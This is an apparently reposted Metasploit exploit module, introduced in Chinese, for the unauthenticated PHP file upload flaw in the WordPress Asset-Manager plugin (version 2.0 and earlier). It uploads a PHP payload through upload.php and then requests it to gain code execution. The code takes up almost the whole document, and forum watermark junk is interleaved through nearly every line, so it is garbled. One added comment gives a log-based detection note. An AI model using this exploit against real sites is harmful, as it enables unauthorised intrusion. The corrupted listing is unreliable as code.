该模块利用 Metasploit 漏洞库中收录的、存在于 WordPress Asset-Manager 插件 2.0 及以下版本的漏洞。该漏洞允许上传 PHP 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
3 d, F- D" k4 t6 `7 D) t: B A) t* \4 l' W; O' |# u0 G; Y
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
5 l9 T* o5 s% o) Q! w
& q* N! S& E: W8 }" ~) M) M$ crequire 'msf/core'
$ e$ M) y( H- g6 Xrequire 'msf/core/exploit/php_exe'
* n/ @9 U% ]1 _3 k) V5 }' Y% D
# Metasploit exploit module for the WordPress Asset-Manager plugin (<= 2.0):
# the plugin's upload.php accepts a file from an unauthenticated client and
# stores it under wp-content/uploads/assets/temp/, from where this module then
# requests it directly.
# NOTE(review): the listing on this page is interleaved with forum watermark
# text and will not parse as-is; the comments below describe the intended code.
9 j% p/ C9 w9 I/ C9 }class Metasploit3 < Msf::Exploit::Remote
% ?3 h7 j4 `$ _) ?/ n! x Rank = ExcellentRanking
! ]/ e6 g" n6 q e0 V1 u/ `/ }! ? M
' `7 j$ Y9 S T% Q+ I! w% {: l include Msf::Exploit::Remote::HttpClient4 v/ Y, h: s" z* w! [: S
include Msf::Exploit: hpEXE) `; A# }$ |% x' @
: k7 ?; m7 t$ J1 I1 F; q
  # Module metadata (name, description, authors, references, payload
  # constraints, targets, disclosure date) and the single TARGETURI option.
def initialize(info = {})* j9 n1 H, ~. `* B, F% m
super(update_info(info,
- z- e0 U E6 W4 A3 e) | 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
7 r, s& p2 [0 @& U A& d% R 'Description' => %q{' r* v! g- u, V. ?, H! ~
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
2 ~/ B4 n" l5 y2 W7 r plugin. By abusing the upload.php file, a malicious user can upload a file to a
|5 j8 n8 l! q+ N5 o temp directory without authentication, which results in arbitrary code execution.- z* N, t# K! G
},
' d: T4 k5 z1 V! H 'Author' =>
( Q: l0 X( r9 g' [7 }7 V6 \ [
" G, r6 w8 O+ N4 F4 H4 q8 w 'Sammy FORGIT', # initial discovery
. x) O: Q3 q& _ 'James Fitts <fitts.james[at]gmail.com>' # metasploit module& S' q' q: l: k! h6 |* h
],5 I2 a9 O# h3 _! r
'License' => MSF_LICENSE,1 B" X; N+ o. F6 |1 o6 G+ P' r
'References' =>
3 H* F$ w9 ` p* E) o8 T [
, m$ J/ a: e) @/ R [ 'OSVDB', '82653' ],
3 w) B( E1 Y$ P9 G- v7 Q* T5 X [ 'BID', '53809' ],/ a4 w( D& K0 r2 ]3 M7 z5 V
[ 'EDB', '18993' ],
; z% v, ^! |+ e* a [ 'URL', 'http:// www.myhack58.com /' ]
. d# a( [. [0 y' x9 o ],
0 Z1 U- Y' V0 \& Y6 W) p 'Payload' =>8 c) t/ w( o9 U- Q$ M
{+ ~. x9 N" d+ W3 U/ j' o6 z m: O
'BadChars' => "\x00",$ J; h0 i6 ?' d4 V( L
},
- f6 S! Z; r/ x% \$ V$ S1 U2 S 'Platform' => 'php',& O4 c4 E& k$ R# \7 N7 d3 z3 J5 v
'Arch' => ARCH_PHP,$ E" `* n0 r$ Y: V% O8 ?. n% B
'Targets' =>
i& Q; \7 i* n [
3 ~5 t, `; Q, n" z0 I/ v* {7 K [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ U9 t/ {' a! \8 B {* p" Z7 I- L
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- v9 w0 [' U$ N# d/ D
],
7 Q* Y; ?4 q: I/ V' P0 z7 [) K1 w1 T 'DefaultTarget' => 0,4 l6 z8 D8 Y* X
'DisclosureDate' => 'May 26 2012'))
/ I' K" e2 b! c ]& a+ j" W4 ] ! j0 ?) y: \/ ~# o4 G, c- L4 ~' M0 E
  # TARGETURI: base path of the WordPress install; defaults to '/wordpress'.
register_options(
+ p9 M, o! c! S2 H [
; t2 A. N& t! R I$ l x OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; J9 x0 u, Y7 f! F& o: x! B) K, Q ], self.class)
# o/ V7 l `. u3 T: Q end
+ S/ l. |$ q( A; o3 @$ }
  # Exploit flow: (1) POST a multipart form whose 'Filedata' part is a PHP file
  # with a random 5-letter name to .../plugins/asset-manager/upload.php, then
  # (2) GET that same file from .../uploads/assets/temp/ so the server runs it.
  # Detection note: both request paths should appear in the web server access
  # log; an unauthenticated POST to upload.php followed by a GET of a newly
  # created .php file under uploads/assets/temp/ is the trace this module leaves.
! G) T7 Q' \9 z def exploit* s/ p, P1 |% L8 t, [
uri = target_uri.path
    # make sure the base path ends with '/' before the plugin paths are appended
* |6 i9 h, Y i U1 e8 y uri << '/' if uri[-1,1] != '/'( }4 c+ ~) a* p8 t7 X
peer = "#{rhost}:#{rport}"7 m/ m q( M/ N% Y- H. Q
payload_name = "#{rand_text_alpha(5)}.php"
    # presumably a PHP stub that removes itself after running (:unlink_self);
    # verify against Msf::Exploit::PhpEXE, which is not shown on this page
& k" T" L2 ~+ R2 ~9 s1 _+ v php_payload = get_write_exec_payload(:unlink_self=>true)# _4 _: }: a; i7 X+ r
- s% x! o: ^$ H$ m: c& p data = Rex::MIME::Message.new
    # the file travels in the multipart field named 'Filedata'
: W+ u% l. H, Q! \ data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")2 P O. _0 d6 m# H
    # strip the CRLF that precedes the first '--_Part_' boundary in the serialised body
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 H$ n9 {7 @0 ~# B4 U - y7 k Z) f4 @6 N: X& ~9 X+ j
print_status("#{peer} - Uploading payload #{payload_name}"): h! ]( ~% L2 Q8 A V8 ~
res = send_request_cgi({
) S' T2 x7 H( ?5 W& \ 'method' => 'POST',; x% m' Q& f) n. _
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",, W( z- k& T% q9 g* |6 d
'ctype' => "multipart/form-data; boundary=#{data.bound}",0 t* U) }9 y4 L7 V' N1 k4 M6 V2 w
'data' => post_data
5 f: V% X+ g' x })" Q9 a- a# z9 C2 G4 b! _
% s2 l8 A2 u8 w/ O! e7 Q( K
    # the upload counts as successful only on HTTP 200 with the filename echoed in the body
if not res or res.code != 200 or res.body !~ /#{payload_name}/
" y, I0 o7 g( n x fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, q _/ w T4 ?end! [( v2 @) C7 E" S
) P. g8 s# E6 O( _' _! g
print_status("#{peer} - Executing payload #{payload_name}")1 {+ l) _5 X9 `( @& z. ^" c* l
res = send_request_raw({- N; d$ r' s3 F7 }3 B7 A& ?
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
* i$ \$ S, h- Z9 J$ T& m 'method' => 'GET'
3 a( Y& ]9 v+ O# I7 ~ })
4 A1 I, W( _$ K6 g* U 6 \% g" C% g. o9 y$ v9 w6 a q/ p
    # unlike the upload check, a nil response is tolerated here (presumably
    # because the executed file may never reply); any non-200 reply is a failure
if res and res.code != 2004 D) K9 x/ n9 s8 k( y+ w. p* m+ ]; p
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
( X+ M' m! l9 D5 Q end1 @. p( X" [5 X% i; ?: l( }! g
end
o' E, J- {7 a0 Jend
) n6 Z$ S& b: ^2 m: B0 _! W |